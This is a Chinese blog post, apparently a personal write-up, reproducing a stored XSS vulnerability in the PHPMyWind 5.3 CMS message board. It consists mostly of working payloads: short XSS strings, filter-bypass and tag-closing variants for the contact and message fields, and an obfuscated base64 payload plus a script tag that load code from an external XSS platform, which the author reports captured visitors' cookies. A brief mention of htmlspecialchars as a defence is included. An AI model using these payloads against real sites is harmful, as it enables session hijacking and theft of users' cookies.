zoukankan      html  css  js  c++  java
  • XSS--PHPwind5.3复现

    xss再分析

    • 短payload
    <svg/onload=alert(1)>
    <body/onfocus=alert``>
    <body/onfocus=confirm``>//过滤alert时用
    

    众多过狗xss payload

    • 防御xss
      htmlspecialchars() 函数
      把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体
      " onmouseover=alert(0) id="

    phpmywind_5-3存储型xss复现

    有留言板,尝试插一下


    好像有过滤,没搞懂能不能行,尝试一下闭合试一下

    <td height="40" align="right">联系方式:</td>
    <td><input type="text" name="contact" id="contact" class="input" value="&lt;img src=x onerror=alert(1)&gt;" /></td>
    

    联系方式这可以

    " onmouseover=alert(0) id="
    "><img src=x onerror=alert(1)><h1 a="
    



    试一试xss平台代码,打不到cookies,应该是长度限制

    留言内容绕过

    <textarea>标签中代码不会执行尝试先闭合这个标签
    应该是可以弹的

    </textarea><img src=x onerror=alert(1)><textarea>
    

    结果没弹,这是被过滤了吗??

    看资料,这一个代码可以,没搞懂,只是怎么闭合的呢??

    "><img/src=x onerror=alert(2001)><"'
    

    经过几次测试,好像是反斜杠的原因

    "><img src=x onerror=alert(2001)><"'
    

    这样就不行,在试几个

    </textarea>
    <img /src=x onerror=alert(1)><textarea>
    

    确实是加上反斜杠就弹窗了
    然而这样打不到cookies,很迷

    <textarea><img /src=xonerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0JONlRLUz8nK01hdGgucmFuZG9tKCk='))></textarea>
    </textarea><script /src=http://xxxx.com/BN6TKS?1526612900></script><textarea>
    

    这个不弹窗的竟然能打到,真迷,

    "><img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0JONlRLUz8nK01hdGgucmFuZG9tKCk='))>< h1 a="
    

    参考链接:http://0day5.com/archives/4033/

  • 相关阅读:
    Java基础教程(20)--数字和字符串
    Java基础教程(19)--Object类
    python 选择和循环结构
    购物清单
    第五次安卓作业(计算器和增删改查)
    第四次安卓作业(用户添加)
    第三次安卓作业(用户登录)
    第二次安卓作业(九宫格)
    5.22作业
    5.29作业
  • 原文地址:https://www.cnblogs.com/hackxf/p/9058186.html
Copyright © 2011-2022 走看看